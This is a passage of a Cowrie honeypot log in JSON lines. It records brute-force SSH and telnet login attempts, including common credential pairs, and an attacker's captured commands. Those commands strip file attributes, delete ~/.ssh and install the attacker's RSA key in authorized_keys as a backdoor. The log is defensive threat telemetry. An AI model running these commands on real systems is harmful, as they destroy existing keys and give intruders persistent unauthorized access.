{"eventid":"cowrie.session.closed","duration":10.396909713745117,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:34:03.972596Z","src_ip":"206.168.34.115","session":"7a218ecaab62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:34:19.126792Z","src_ip":"212.227.235.229","session":"73ba49b498c4"}
{"eventid":"cowrie.session.closed","duration":180.2225480079651,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:34:19.130042Z","src_ip":"212.227.235.229","session":"73ba49b498c4"}
{"eventid":"cowrie.session.connect","src_ip":"159.223.199.28","src_port":39138,"dst_ip":"1.2.3.4","dst_port":23,"session":"fedf52504703","protocol":"telnet","message":"New connection: 159.223.199.28:39138 (1.2.3.4:23) [session: fedf52504703]","sensor":"my-vps","timestamp":"2025-08-28T15:35:39.726532Z"}
{"eventid":"cowrie.session.closed","duration":5.232045412063599,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:35:44.958508Z","src_ip":"159.223.199.28","session":"fedf52504703"}
{"eventid":"cowrie.session.connect","src_ip":"159.223.199.28","src_port":57064,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b35c450333c","protocol":"telnet","message":"New connection: 159.223.199.28:57064 (1.2.3.4:23) [session: 0b35c450333c]","sensor":"my-vps","timestamp":"2025-08-28T15:35:45.115216Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44004,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd25bf7566f6","protocol":"ssh","message":"New connection: 212.227.235.229:44004 (1.2.3.4:22) [session: dd25bf7566f6]","sensor":"my-vps","timestamp":"2025-08-28T15:35:46.928255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:35:46.929204Z","src_ip":"212.227.235.229","session":"dd25bf7566f6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T15:35:47.035482Z","src_ip":"212.227.235.229","session":"dd25bf7566f6"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:35:47.174827Z","src_ip":"159.223.199.28","session":"0b35c450333c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:35:47.582265Z","src_ip":"159.223.199.28","session":"0b35c450333c"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol123","message":"login attempt [sol/sol123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:35:47.688397Z","src_ip":"212.227.235.229","session":"dd25bf7566f6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:35:48.795613Z","src_ip":"212.227.235.229","session":"dd25bf7566f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.2","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:35:50.797856Z","src_ip":"159.223.199.28","session":"0b35c450333c"}
{"eventid":"cowrie.session.closed","duration":5.687301397323608,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:35:50.802445Z","src_ip":"159.223.199.28","session":"0b35c450333c"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":57331,"dst_ip":"1.2.3.4","dst_port":23,"session":"db74c65393fb","protocol":"telnet","message":"New connection: 123.31.39.100:57331 (1.2.3.4:23) [session: db74c65393fb]","sensor":"my-vps","timestamp":"2025-08-28T15:36:30.940117Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46401,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3eda3f9db84","protocol":"telnet","message":"New connection: 212.227.125.160:46401 (1.2.3.4:23) [session: a3eda3f9db84]","sensor":"my-vps","timestamp":"2025-08-28T15:36:31.972255Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49478,"dst_ip":"1.2.3.4","dst_port":23,"session":"c94e92bb1849","protocol":"telnet","message":"New connection: 212.227.235.229:49478 (1.2.3.4:23) [session: c94e92bb1849]","sensor":"my-vps","timestamp":"2025-08-28T15:36:33.032794Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49436,"dst_ip":"1.2.3.4","dst_port":23,"session":"c783c1533ddc","protocol":"telnet","message":"New connection: 212.227.235.229:49436 (1.2.3.4:23) [session: c783c1533ddc]","sensor":"my-vps","timestamp":"2025-08-28T15:36:33.035639Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":45195,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0796cf5ee05","protocol":"telnet","message":"New connection: 123.31.39.100:45195 (1.2.3.4:23) [session: a0796cf5ee05]","sensor":"my-vps","timestamp":"2025-08-28T15:36:35.011590Z"}
{"eventid":"cowrie.session.closed","duration":47.149441719055176,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:18.089487Z","src_ip":"123.31.39.100","session":"db74c65393fb"}
{"eventid":"cowrie.session.closed","duration":47.15298867225647,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:19.125166Z","src_ip":"212.227.125.160","session":"a3eda3f9db84"}
{"eventid":"cowrie.session.closed","duration":47.12521529197693,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:20.157942Z","src_ip":"212.227.235.229","session":"c94e92bb1849"}
{"eventid":"cowrie.session.closed","duration":47.12510275840759,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:20.160446Z","src_ip":"212.227.235.229","session":"c783c1533ddc"}
{"eventid":"cowrie.session.closed","duration":46.12276864051819,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:21.134251Z","src_ip":"123.31.39.100","session":"a0796cf5ee05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57570,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb4f4b8109d","protocol":"ssh","message":"New connection: 212.227.235.229:57570 (1.2.3.4:22) [session: 0bb4f4b8109d]","sensor":"my-vps","timestamp":"2025-08-28T15:37:22.857445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:37:22.859101Z","src_ip":"212.227.235.229","session":"0bb4f4b8109d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:37:23.173855Z","src_ip":"212.227.235.229","session":"0bb4f4b8109d"}
{"eventid":"cowrie.login.failed","username":"sun","password":"123456","message":"login attempt [sun/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T15:37:24.474155Z","src_ip":"212.227.235.229","session":"0bb4f4b8109d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:25.792291Z","src_ip":"212.227.235.229","session":"0bb4f4b8109d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60902,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dc4eccb34a9","protocol":"ssh","message":"New connection: 212.227.235.229:60902 (1.2.3.4:22) [session: 0dc4eccb34a9]","sensor":"my-vps","timestamp":"2025-08-28T15:37:49.875296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:37:49.876269Z","src_ip":"212.227.235.229","session":"0dc4eccb34a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:37:50.091688Z","src_ip":"212.227.235.229","session":"0dc4eccb34a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qaz123","message":"login attempt [admin/qaz123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:37:50.994727Z","src_ip":"212.227.235.229","session":"0dc4eccb34a9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:37:52.212915Z","src_ip":"212.227.235.229","session":"0dc4eccb34a9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64236,"dst_ip":"1.2.3.4","dst_port":22,"session":"64d13be7eb6a","protocol":"ssh","message":"New connection: 217.72.205.35:64236 (1.2.3.4:22) [session: 64d13be7eb6a]","sensor":"my-vps","timestamp":"2025-08-28T15:40:07.588051Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:40:07.589141Z","src_ip":"217.72.205.35","session":"64d13be7eb6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48734,"dst_ip":"1.2.3.4","dst_port":22,"session":"794ea76b7cdd","protocol":"ssh","message":"New connection: 212.227.235.229:48734 (1.2.3.4:22) [session: 794ea76b7cdd]","sensor":"my-vps","timestamp":"2025-08-28T15:40:10.502296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:40:10.503866Z","src_ip":"212.227.235.229","session":"794ea76b7cdd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:40:10.745093Z","src_ip":"212.227.235.229","session":"794ea76b7cdd"}
{"eventid":"cowrie.login.failed","username":"john","password":"john","message":"login attempt [john/john] failed","sensor":"my-vps","timestamp":"2025-08-28T15:40:11.751639Z","src_ip":"212.227.235.229","session":"794ea76b7cdd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:40:12.995426Z","src_ip":"212.227.235.229","session":"794ea76b7cdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48480,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c57289dada4","protocol":"telnet","message":"New connection: 212.227.125.160:48480 (1.2.3.4:23) [session: 8c57289dada4]","sensor":"my-vps","timestamp":"2025-08-28T15:40:49.565769Z"}
{"eventid":"cowrie.session.closed","duration":30.553277730941772,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:41:20.118977Z","src_ip":"212.227.125.160","session":"8c57289dada4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49802,"dst_ip":"1.2.3.4","dst_port":22,"session":"c08dcfd7744b","protocol":"ssh","message":"New connection: 212.227.235.229:49802 (1.2.3.4:22) [session: c08dcfd7744b]","sensor":"my-vps","timestamp":"2025-08-28T15:41:32.178490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:41:32.179278Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:41:32.393143Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rd1234","message":"login attempt [root/P@$$w0rd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:41:33.289365Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:41:33.736762Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:41:33.737444Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:41:33.738635Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:41:33.953995Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:41:34.440537Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:41:34.441259Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:41:34.658371Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:41:34.659399Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49818,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7c55f415c88","protocol":"ssh","message":"New connection: 212.227.235.229:49818 (1.2.3.4:22) [session: f7c55f415c88]","sensor":"my-vps","timestamp":"2025-08-28T15:41:34.873546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:41:34.874408Z","src_ip":"212.227.235.229","session":"f7c55f415c88"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:41:35.090182Z","src_ip":"212.227.235.229","session":"f7c55f415c88"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:41:35.994336Z","src_ip":"212.227.235.229","session":"f7c55f415c88"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:41:37.214106Z","src_ip":"212.227.235.229","session":"f7c55f415c88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35086,"dst_ip":"1.2.3.4","dst_port":22,"session":"d677ad1f24c4","protocol":"ssh","message":"New connection: 212.227.235.229:35086 (1.2.3.4:22) [session: d677ad1f24c4]","sensor":"my-vps","timestamp":"2025-08-28T15:41:37.437382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:41:37.438349Z","src_ip":"212.227.235.229","session":"d677ad1f24c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519",